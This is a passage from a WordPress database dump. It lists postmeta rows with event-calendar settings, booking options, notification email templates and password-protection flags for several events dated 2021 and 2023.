/>\r\n%%blog_name%%</p>\";}}'),(174967,267692,'passster_activate_global_protection',NULL),(174968,267692,'passster_activate_protection',NULL),(174969,267692,'passster_protection_type','password'),(174970,267692,'_dp_original','265240'),(174971,267692,'_edit_lock','1673759628:15'),(174972,267692,'_edit_last','15'),(174973,267692,'boldgrid_in_page_containers','1'),(174974,267692,'_thumbnail_id','266821'),(174975,267694,'mec_moved_online_link',''),(174976,267694,'mec_cancelled_reason',''),(174977,267694,'mec_display_cancellation_reason_in_single_page',''),(174978,267694,'boldgrid_hide_page_title','0'),(174979,267694,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(174980,267694,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-02-05\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-02-05\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(174981,267694,'mec_currency','a:0:{}'),(174982,267694,'mec_additional_organizer_ids','a:0:{}'),(174983,267694,'mec_additional_location_ids','a:0:{}'),(174984,267694,'mec_cost',''),(174985,267694,'mec_more_info_target','_self'),(174986,267694,'mec_more_info_title',''),(174987,267694,'mec_organizer_id','1'),(174988,267694,'mec_read_more',''),(174989,267694,'mec_more_info',''),(174990,267694,'mec_repeat_type',''),(174991,267694,'mec_repeat_status','0'),(174992,267694,'mec_end_day_seconds','84600'),(174993,267694,'mec_end_time_ampm','PM'),(174994,267694,'mec_end_time_minutes','30'),(174995,267694,'mec_end_time_hour','11'),(174996,267694,'mec_end_date','2023-02-05'),(174997,267694,'mec_start_day_seconds','37800'),(174998,267694,'mec_start_time_ampm','AM'),(174999,267694,'mec_start_time_minutes','30'),(175000,267694,'mec_public','1'),(175001,267694,'mec_start_date','2023-02-05'),(175002,267694,'mec_start_time_hour','10'),(175003,267694,'mec_countdown_method','global'),(175004,267694,'mec_timezone','global'),(175005,267694,'mec_comment',''),(175006,267694,'one_occurrence','0'),(175007,267694,'mec_hide_time','0'),(175008,267694,'mec_hide_end_time','0'),(175009,267694,'mec_event_status','EventScheduled'),(175010,267694,'mec_fields','a:0:{}'),(175011,267694,'mec_op','a:0:{}'),(175012,267694,'mec_bfixed_fields','a:0:{}'),(175013,267694,'mec_reg_fields','a:0:{}'),(175014,267694,'mec_reg_fields_global_inheritance','1'),(175015,267694,'mec_ticket_variations','a:0:{}'),(175016,267694,'mec_ticket_variations_global_inheritance','1'),(175017,267694,'mec_fees','a:0:{}'),(175018,267694,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(175019,267694,'mec_tickets','a:0:{}'),(175020,267694,'mec_fees_global_inheritance','1'),(175021,267694,'mec_hourly_schedules','a:0:{}'),(175022,267694,'mec_not_in_days',''),(175023,267694,'mec_in_days',''),(175024,267694,'mec_repeat_end_at_date',''),(175025,267694,'mec_advanced_days','a:0:{}'),(175026,267694,'passster_protection_type','password'),(175027,267694,'passster_activate_global_protection',NULL),(175028,267694,'passster_activate_protection',NULL),(175029,267694,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(175030,267694,'boldgrid_in_page_containers','1'),(175031,267694,'mec_repeat_end_at_occurrences',''),(175032,267694,'mec_repeat_end',''),(175033,267694,'mec_repeat_interval','1'),(175034,267694,'mec_allday','0'),(175035,267694,'mec_certain_weekdays','a:0:{}'),(175036,267694,'mec_dont_show_map','0'),(175037,267694,'mec_location_id','122'),(175038,267694,'mec_color',''),(175039,267694,'protect_children',''),(175040,267694,'_edit_lock','1673759997:15'),(175041,267694,'_edit_last','15'),(175042,267694,'_thumbnail_id','266634'),(175043,267696,'protect_children',''),(175044,267696,'mec_color',''),(175045,267696,'mec_location_id','118'),(175046,267696,'mec_dont_show_map','0'),(175047,267696,'mec_organizer_id','1'),(175048,267696,'mec_read_more',''),(175049,267696,'mec_more_info',''),(175050,267696,'mec_more_info_title',''),(175051,267696,'mec_more_info_target','_self'),(175052,267696,'mec_cost',''),(175053,267696,'mec_currency','a:0:{}'),(175054,267696,'mec_additional_organizer_ids','a:0:{}'),(175055,267696,'mec_additional_location_ids','a:0:{}'),(175056,267696,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-04-22\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-04-22\";s:4:\"hour\";s:1:\"6\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(175057,267696,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(175058,267696,'mec_certain_weekdays','a:0:{}'),(175059,267696,'mec_allday','0'),(175060,267696,'one_occurrence','0'),(175061,267696,'mec_hide_time','0'),(175062,267696,'mec_hide_end_time','0'),(175063,267696,'mec_comment',''),(175064,267696,'mec_timezone','global'),(175065,267696,'mec_countdown_method','global'),(175066,267696,'mec_public','1'),(175067,267696,'mec_start_date','2021-04-22'),(175068,267696,'mec_start_time_hour','8'),(175069,267696,'mec_start_time_minutes','0'),(175070,267696,'mec_start_time_ampm','AM'),(175071,267696,'mec_start_day_seconds','28800'),(175072,267696,'mec_end_date','2021-04-22'),(175073,267696,'mec_end_time_hour','6'),(175074,267696,'mec_end_time_minutes','0'),(175075,267696,'mec_end_time_ampm','PM'),(175076,267696,'mec_end_day_seconds','64800'),(175077,267696,'mec_repeat_status','0'),(175078,267696,'mec_repeat_type',''),(175079,267696,'mec_repeat_interval','1'),(175080,267696,'mec_repeat_end',''),(175081,267696,'mec_repeat_end_at_occurrences',''),(175082,267696,'mec_repeat_end_at_date',''),(175083,267696,'mec_advanced_days','a:0:{}'),(175084,267696,'mec_in_days',''),(175085,267696,'mec_not_in_days',''),(175086,267696,'mec_hourly_schedules','a:0:{}'),(175087,267696,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(190561,265919,'mec_trailer_url',''),(190562,265919,'mec_trailer_title',''),(175088,267696,'mec_tickets','a:0:{}'),(175089,267696,'mec_fees_global_inheritance','1'),(175090,267696,'mec_fees','a:0:{}'),(175091,267696,'mec_ticket_variations_global_inheritance','1'),(175092,267696,'mec_ticket_variations','a:0:{}'),(175093,267696,'mec_reg_fields_global_inheritance','1'),(175094,267696,'mec_reg_fields','a:0:{}'),(175095,267696,'mec_bfixed_fields','a:0:{}'),(175096,267696,'mec_op','a:0:{}'),(175097,267696,'mec_fields','a:0:{}'),(175098,267696,'mec_event_status','EventScheduled'),(175099,267696,'mec_moved_online_link',''),(175100,267696,'mec_cancelled_reason',''),(175101,267696,'mec_display_cancellation_reason_in_single_page',''),(175102,267696,'boldgrid_hide_page_title','0'),(175103,267696,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(175104,267696,'passster_activate_global_protection',NULL),(175105,267696,'passster_activate_protection',NULL),(175106,267696,'passster_protection_type','password'),(175107,267696,'boldgrid_in_page_containers','1'),(175108,267696,'_dp_original','265240'),(175109,267697,'protect_children',''),(175110,267697,'mec_color',''),(175111,267697,'mec_location_id','170'),(175112,267697,'mec_dont_show_map','0'),(175113,267697,'mec_organizer_id','1'),(175114,267697,'mec_read_more',''),(175115,267697,'mec_more_info',''),(175116,267697,'mec_more_info_title',''),(175117,267697,'mec_more_info_target','_self'),(175118,267697,'mec_cost',''),(175119,267697,'mec_currency','a:0:{}'),(175120,267697,'mec_additional_organizer_ids','a:0:{}'),(175121,267697,'mec_additional_location_ids','a:0:{}'),(175122,267697,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-02-08\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-02-08\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(175123,267697,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(175124,267697,'mec_certain_weekdays','a:0:{}'),(175125,267697,'mec_allday','0'),(175126,267697,'one_occurrence','0'),(175127,267697,'mec_hide_time','0'),(175128,267697,'mec_hide_end_time','0'),(175129,267697,'mec_comment',''),(175130,267697,'mec_timezone','global'),(175131,267697,'mec_countdown_method','global'),(175132,267697,'mec_public','1'),(175133,267697,'mec_start_date','2023-02-08'),(175134,267697,'mec_start_time_hour','7'),(175135,267697,'mec_start_time_minutes','0'),(175136,267697,'mec_start_time_ampm','PM'),(175137,267697,'mec_start_day_seconds','68400'),(175138,267697,'mec_end_date','2023-02-08'),(175139,267697,'mec_end_time_hour','8'),(175140,267697,'mec_end_time_minutes','0'),(175141,267697,'mec_end_time_ampm','PM'),(175142,267697,'mec_end_day_seconds','72000'),(175143,267697,'mec_repeat_status','0'),(175144,267697,'mec_repeat_type',''),(175145,267697,'mec_repeat_interval','1'),(175146,267697,'mec_repeat_end',''),(175147,267697,'mec_repeat_end_at_occurrences',''),(175148,267697,'mec_repeat_end_at_date',''),(175149,267697,'mec_advanced_days','a:0:{}'),(175150,267697,'mec_in_days',''),(175151,267697,'mec_not_in_days',''),(175152,267697,'mec_hourly_schedules','a:0:{}'),(175153,267697,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(175154,267697,'mec_tickets','a:0:{}'),(175155,267697,'mec_fees_global_inheritance','1'),(175156,267697,'mec_fees','a:0:{}'),(175157,267697,'mec_ticket_variations_global_inheritance','1'),(175158,267697,'mec_ticket_variations','a:0:{}'),(175159,267697,'mec_reg_fields_global_inheritance','1'),(175160,267697,'mec_reg_fields','a:0:{}'),(175161,267697,'mec_bfixed_fields','a:0:{}'),(175162,267697,'mec_op','a:0:{}'),(175163,267697,'mec_fields','a:0:{}'),(175164,267697,'mec_event_status','EventScheduled'),(175165,267697,'mec_moved_online_link',''),(175166,267697,'mec_cancelled_reason',''),(175167,267697,'mec_display_cancellation_reason_in_single_page',''),(175168,267697,'boldgrid_hide_page_title','0'),(175169,267697,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(175170,267697,'passster_activate_global_protection',NULL),(175171,267697,'passster_activate_protection',NULL),(175172,267697,'passster_protection_type','password'),(175173,267697,'boldgrid_in_page_containers','1'),(175174,267697,'_dp_original','265240'),(175175,267697,'_edit_lock','1673760618:15'),(175176,267697,'_edit_last','15'),(175177,267697,'_thumbnail_id','266155'),(175178,267698,'protect_children',''),(175179,267698,'mec_color',''),(175180,267698,'mec_location_id','118'),(175181,267698,'mec_dont_show_map','0'),(175182,267698,'mec_organizer_id','1'),(175183,267698,'mec_read_more',''),(175184,267698,'mec_more_info',''),(175185,267698,'mec_more_info_title',''),(175186,267698,'mec_more_info_target','_self'),(175187,267698,'mec_cost',''),(175188,267698,'mec_currency','a:0:{}'),(175189,267698,'mec_additional_organizer_ids','a:0:{}'),(175190,267698,'mec_additional_location_ids','a:0:{}'),(175191,267698,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-02-18\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-02-18\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(175192,267698,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(175193,267698,'mec_certain_weekdays','a:0:{}'),(175194,267698,'mec_allday','0'),(175195,267698,'one_occurrence','0'),(175196,267698,'mec_hide_time','0'),(175197,267698,'mec_hide_end_time','0'),(175198,267698,'mec_comment',''),(175199,267698,'mec_timezone','global'),(175200,267698,'mec_countdown_method','global'),(175201,267698,'mec_public','1'),(175202,267698,'mec_start_date','2023-02-18'),(175203,267698,'mec_start_time_hour','1'),(175204,267698,'mec_start_time_minutes','0'),(175205,267698,'mec_start_time_ampm','PM'),(175206,267698,'mec_start_day_seconds','46800'),(175207,267698,'mec_end_date','2023-02-18'),(175208,267698,'mec_end_time_hour','2'),(175209,267698,'mec_end_time_minutes','0'),(175210,267698,'mec_end_time_ampm','PM'),(175211,267698,'mec_end_day_seconds','50400'),(175212,267698,'mec_repeat_status','0'),(175213,267698,'mec_repeat_type',''),(175214,267698,'mec_repeat_interval','1'),(175215,267698,'mec_repeat_end',''),(175216,267698,'mec_repeat_end_at_occurrences',''),(175217,267698,'mec_repeat_end_at_date',''),(175218,267698,'mec_advanced_days','a:0:{}'),(175219,267698,'mec_in_days',''),(175220,267698,'mec_not_in_days',''),(175221,267698,'mec_hourly_schedules','a:0:{}'),(175222,267698,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(175223,267698,'mec_tickets','a:0:{}'),(175224,267698,'mec_fees_global_inheritance','1'),(175225,267698,'mec_fees','a:0:{}'),(175226,267698,'mec_ticket_variations_global_inheritance','1'),(175227,267698,'mec_ticket_variations','a:0:{}'),(175228,267698,'mec_reg_fields_global_inheritance','1'),(175229,267698,'mec_reg_fields','a:0:{}'),(175230,267698,'mec_bfixed_fields','a:0:{}'),(175231,267698,'mec_op','a:0:{}'),(175232,267698,'mec_fields','a:0:{}'),(175233,267698,'mec_event_status','EventScheduled'),(175234,267698,'mec_moved_online_link',''),(175235,267698,'mec_cancelled_reason',''),(175236,267698,'mec_display_cancellation_reason_in_single_page',''),(175237,267698,'boldgrid_hide_page_title','0'),(175238,267698,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(175239,267698,'passster_activate_global_protection',NULL),(175240,267698,'passster_activate_protection',NULL),(175241,267698,'passster_protection_type','password'),(175242,267698,'_dp_original','265240'),(175243,267698,'_edit_lock','1673761026:15'),(175244,267698,'_edit_last','15'),(175245,267698,'boldgrid_in_page_containers','1'),(175246,267698,'_thumbnail_id','266397'),(175247,267700,'protect_children',''),(175248,267700,'mec_color',''),(175249,267700,'mec_location_id','118'),(175250,267700,'mec_dont_show_map','0'),(175251,267700,'mec_organizer_id','1'),(175252,267700,'mec_read_more',''),(175253,267700,'mec_more_info',''),(175254,267700,'mec_more_info_title',''),(175255,267700,'mec_more_info_target','_self'),(175256,267700,'mec_cost',''),(175257,267700,'mec_currency','a:0:{}'),(175258,267700,'mec_additional_organizer_ids','a:0:{}'),(175259,267700,'mec_additional_location_ids','a:0:{}'),(175260,267700,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-02-21\";s:4:\"hour\";s:1:\"3\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-02-21\";s:4:\"hour\";s:1:\"4\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(175261,267700,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(175262,267700,'mec_certain_weekdays','a:0:{}'),(175263,267700,'mec_allday','0'),(175264,267700,'one_occurrence','0'),(175265,267700,'mec_hide_time','0'),(175266,267700,'mec_hide_end_time','0'),(175267,267700,'mec_comment',''),(175268,267700,'mec_timezone','global'),(175269,267700,'mec_countdown_method','global'),(175270,267700,'mec_public','1'),(175271,267700,'mec_start_date','2023-02-21'),(175272,267700,'mec_start_time_hour','3'),(175273,267700,'mec_start_time_minutes','0'),(175274,267700,'mec_start_time_ampm','PM'),(175275,267700,'mec_start_day_seconds','54000'),(175276,267700,'mec_end_date','2023-02-21'),(175277,267700,'mec_end_time_hour','4'),(175278,267700,'mec_end_time_minutes','0'),(175279,267700,'mec_end_time_ampm','PM'),(175280,267700,'mec_end_day_seconds','57600'),(175281,267700,'mec_repeat_status','0'),(175282,267700,'mec_repeat_type',''),(175283,267700,'mec_repeat_interval','1'),(175284,267700,'mec_repeat_end',''),(175285,267700,'mec_repeat_end_at_occurrences',''),(175286,267700,'mec_repeat_end_at_date',''),(175287,267700,'mec_advanced_days','a:0:{}'),(175288,267700,'mec_in_days',''),(175289,267700,'mec_not_in_days',''),(175290,267700,'mec_hourly_schedules','a:0:{}'),(175291,267700,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(175292,267700,'mec_tickets','a:0:{}'),(175293,267700,'mec_fees_global_inheritance','1'),(175294,267700,'mec_fees','a:0:{}'),(175295,267700,'mec_ticket_variations_global_inheritance','1'),(175296,267700,'mec_ticket_variations','a:0:{}'),(175297,267700,'mec_reg_fields_global_inheritance','1'),(175298,267700,'mec_reg_fields','a:0:{}'),(175299,267700,'mec_bfixed_fields','a:0:{}'),(175300,267700,'mec_op','a:0:{}'),(175301,267700,'mec_fields','a:0:{}'),(175302,267700,'mec_event_status','EventScheduled'),(175303,267700,'mec_moved_online_link',''),(175304,267700,'mec_cancelled_reason',''),(175305,267700,'mec_display_cancellation_reason_in_single_page',''),(175306,267700,'boldgrid_hide_page_title','0'),(175307,267700,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br 